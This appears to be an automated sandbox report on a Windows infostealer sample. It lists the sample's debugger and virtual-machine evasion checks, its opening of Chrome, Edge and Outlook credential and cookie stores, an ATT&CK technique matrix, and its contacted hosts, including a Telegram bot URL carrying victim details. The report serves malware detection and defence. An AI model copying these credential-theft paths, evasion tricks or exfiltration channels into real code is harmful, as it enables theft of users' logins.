                Source: Binary string: _.pdb source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Static PE information: real checksum: 0x23bfb should be: 0x36a3f
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_0040E21D push ecx; ret 0_2_0040E230
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_0216E558 push eax; iretd 0_2_0216E559
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_061CC4EA push es; iretd 0_2_061CC4FC
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_0642FB1E push es; ret 0_2_0642FB20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_070A934F push es; ret 0_2_070A9360
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Memory allocated: 2160000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Memory allocated: 2580000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Memory allocated: 2300000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Window / User API: threadDelayed 7763
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Window / User API: threadDelayed 2064
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392 Thread sleep count: 34 > 30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392 Thread sleep time: -31359464925306218s >= -30000s
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392 Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392 Thread sleep time: -599891s >= -30000s
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7400 Thread sleep count: 7763 > 30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7400 Thread sleep count: 2064 > 30
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594381s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -594047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe TID: 7392Thread sleep time: -593938s >= -30000sJump to behavior
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmtoolsd
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe API call chain: ExitProcess graph end node graph_0-83591
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_061C9578 LdrInitializeThunk,0_2_061C9578
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Memory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: GetLocaleInfoA,0_2_00417A20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                Source: Yara match File source: 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 31 Virtualization/Sandbox Evasion | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 3 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 24 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | 50% | ReversingLabs | Win32.Infostealer.ClipBanker | |
| 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | 100% | Avira | HEUR/AGEN.1305924 | |
| 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://the.drillmmcsnk.top/den/P4.php | 0% | Avira URL Cloud | safe | |
| http://the.drillmmcsnk.top/den/api.php | 0% | Avira URL Cloud | safe | |
| http://the.drillmmcsnk.top | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| reallyfreegeoip.org | 104.21.67.152 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| the.drillmmcsnk.top | 5.182.211.149 | true | false | | unknown |
| checkip.dyndns.com | 132.226.8.169 | true | false | | high |
| checkip.dyndns.org | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
| http://the.drillmmcsnk.top/den/P4.php | false | Avira URL Cloud: safe | unknown |
| https://reallyfreegeoip.org/xml/8.46.123.75 | false | | high |
| http://checkip.dyndns.org/ | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
| 104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |
| 5.182.211.149 | the.drillmmcsnk.top | Netherlands | 64425 | SKB-ENTERPRISENL | false |
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1562938
                                                                                            Start date and time:2024-11-26 09:45:58 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 8m 14s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
